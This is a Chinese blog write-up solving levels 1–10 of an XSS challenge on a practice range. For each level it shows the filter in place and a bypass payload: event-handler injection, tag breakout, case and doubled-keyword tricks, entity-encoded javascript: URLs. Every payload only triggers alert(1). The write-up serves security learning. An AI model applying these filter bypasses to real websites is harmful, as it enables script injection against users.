关注我们

哆啦靶场XSS挑战赛1-10关攻略

LzersLzers 安全文摘 2020-05-06 12319 0

哆啦集成了网络上常见的靶场与GitHub上比较好的靶场系统,配合一键启动模式,省去你去收集再进行搭建的时间,方便你更加快速的学习信息安全。

该靶场已经正式开源,黑白网去除登录限制重构靶场环境,bachang.heibai.org

哆啦靶场XSS挑战赛1-10关攻略

正文部分

XSS挑战赛第一关

哆啦靶场XSS挑战赛1-10关攻略

F12查看了源码发现并没有任何过滤,

<script>alert(1)</script>

哆啦靶场XSS挑战赛1-10关攻略XSS挑战赛第二关

哆啦靶场XSS挑战赛1-10关攻略

查看源码发现<>尖括号无法使用

框内输入

" onmouseover=alert(1)>[object Object]

或者将input文本框提前闭合

"><script>alert(1)</script>[object Object]

XSS挑战赛第三关

和第二关的区别在于代码内多了一句value='".htmlspecialchars($str)."'

无法使用尖括号,so继续使用不用尖括号的弹窗

' onmouseover=alert(1)//

在源码构成

<input name="keyword" value=" " onmouseover="alert(1)//'">

即可

哆啦靶场XSS挑战赛1-10关攻略

XSS挑战赛第四关

htmlspecialchars+尖括号过滤

在没有尖括号并且语句不被htmlspecialchars()函数影响的情况下

哆啦靶场XSS挑战赛1-10关攻略

输入

" onclick=alert(1) //

在点击搜索框触发XSS

XSS挑战赛第五关

strreplace 就直接把on转换成 o_n
这样就过滤了js事件但是没过滤尖括号

所以

"><a href=javascript:alert(1)>

即可

点击“>触发

哆啦靶场XSS挑战赛1-10关攻略

XSS挑战赛第六关

script 转换成 scr_ipt
on 转换成 o_n
src 转换成 sr_c
data 转换成 da_ta
href 转换成 hr_ef

但是没有大小写约束

"> <Script>alert(1)</script> //

直接冲冲冲

哆啦靶场XSS挑战赛1-10关攻略

XSS挑战赛第七关

禁用了大小写同时script,on,src ,data ,href 都直接转换成空。

利用双写绕过

">hello<sscriptcript>alert(1)</sscriptcript>

哆啦靶场XSS挑战赛1-10关攻略

XSS挑战赛第八关

script 转换成 scr_ipt
on 转换成 o_n
src 转换成 sr_c
data 转换成 da_ta
href 转换成 hr_ef
大小写禁用
" 被编码,但是尖括号等符号没有被过滤,输出点在a标签内,href属性中

javascript会被替换成javasc_rpt,我们使用&#x72来代替r

哆啦靶场XSS挑战赛1-10关攻略

键入

javascrip&#x74;:alert(1)

并点击添加后,再点击友情链接即可触发

XSS挑战赛第九关

查看源码发现不带http://即为不合法提交

javascrip&#x74;:alert(1)//http://heibai.org

哆啦靶场XSS挑战赛1-10关攻略

键入后点击友情链接即可触发

XSS挑战赛第十关

查看源代码,有get参数有隐藏框

keyword = test&t_sort="type="text" onclick = "alert(1)

直接冲冲冲

哆啦靶场XSS挑战赛1-10关攻略

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址